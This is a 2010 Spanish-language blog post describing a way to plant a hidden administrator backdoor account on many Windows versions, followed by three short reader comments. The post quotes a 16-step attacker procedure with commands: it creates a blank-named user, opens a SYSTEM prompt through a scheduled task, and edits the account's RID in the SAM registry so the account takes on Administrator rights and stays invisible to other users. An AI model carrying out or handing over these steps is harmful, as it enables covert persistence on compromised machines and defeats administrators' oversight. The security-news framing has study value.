miércoles, 8 de diciembre de 2010

El amigo invisible de Windows

¿Quién no conoce este juego? Mientras el misterio y la duda nos absorbe, andamos esperando algún regalo de ese amigo peculiar que solemos ver todos los días, pero que por no romper la ilusión, permanece mariposeando para que no sepamos quien es. Aunque dicho así, peor sería no encontrar el final de la diversión y que nuestro querido amigo no diese la cara nunca.


Resulta que cabe la posibilidad de encontrar un amigo invisible dentro de nuestro PC, según afirma StenoPlasma y nosotros sin saber nada, hay que ver que gente más graciosa habita por nuestros alrededores y las sorpresas que este amigo nos dé, seguramente que no sean muy agradables.

El fallo encontrado, se basa en un error de procesamiento sobre el archivo SAM, que ya popularmente conocido, como el fichero que guarda cifradas las contraseñas de las sesiones de Windows. Dicho error, podría permitir a un usuario sin acceso, crear una cuenta con privilegio de administración en el sistema y con la consiguiente posibilidad de pasar desapercibida. Las versiones Microsoft Windows 2000 Workstation, Windows 2000 Server, Windows Server 2003, Windows XP, Windows Vista, Windows 7 y Windows Server 2008, son vulnerables a la creación de esta puerta trasera, con la que el administrador real compartirá el escritorio y su propio perfil de usuario sin previo aviso.

En el caso de que un administrador lanzase una consulta para inspeccionar los usuarios creados en el sistema, esta no aparecerá y tan solo se podrá ver desde nuestra propia cuenta. Una vez terminado el proceso, el atacante podría automatizarlo creando una tarea programada como inicio automático de la sesión invisible.

Los pasos dictados por StenoPlasma (at) son los siguientes:



Step 1: Attacker compromises the Windows computer using any available method.
Step 2: Attacker creates a user account with a blank username using 'net user " " P@$$w0rd /add'. In between the double quotes, you can use ALT+0160 to create the blankspace.
Step 3: Attacker creates an interactive scheduled task to run a minute after creating it. This scheduled task brings up a command prompt as the NT Authority\SYSTEM account on Windows 2000, XP, and 2003. 'at 11:24 /interactive cmd.exe'. If using Windows Vista, 7, or 2008 Server, the attacker must do all registry editing from the command line using 'schtasks'.
Step 4: Once the SYSTEM command prompt comes up, open regedit from the command line.
Step 5: Browse to 'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names'
Step 6: Click on the newly created user account's user name.
Step 7: Take note of the "Type" field for that user.
Step 8: In this example, the backdooruser's "Type" is 0x3f7 and the built-in Administrator's is 0x01F4.
Step 9: Under 'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users' click on 000003F7.
Step 10: In the right pane, double click on the "F" key.
Step 11: Go to the 7th row of HEX values.
Step 12: Change the value from "F7 03" to "F4 01".
Step 13: Log off then log on using your new backdoor account.
Step 14: You will notice that you are now using the Administrator's desktop and rights.
Step 15: When you run 'net localgroup Administrators' you will see your backdoor account listed only when you log in as the backdooruser to check for it. If any other user runs the same command they will only see the regular user accounts.
Step 16: Delete any other temporary accounts you may have made during the method. 

 

En los primeros pasos se explica como hacer una elevación de privilegios como comenté en esta entrada, que nos podría incluso facilitar el trabajo para las versiones más complejas como pueden ser Windows Vista, 2008 y 7.

Reserven los regalos caros para navidades... pues el tema del amigo invisible como ven les puede salir gratis.

Saludos 4n4les!

3 comentarios:

  1. BOnita info intentare ver si funciona en win7 y sino intentare modificar un programilla que hacia lo mismo en xp

    ResponderEliminar
  2. Ey men vives al lado de mi casa makina.
    Menudos PEDOS me habre pillado en Getafe xDDDD

    Un saludo

    ResponderEliminar
  3. @zeroXdevil
    jajaj entonces nos habremos cruzado seguramente, pero al ir los dos ciegos...

    Saludos!

    ResponderEliminar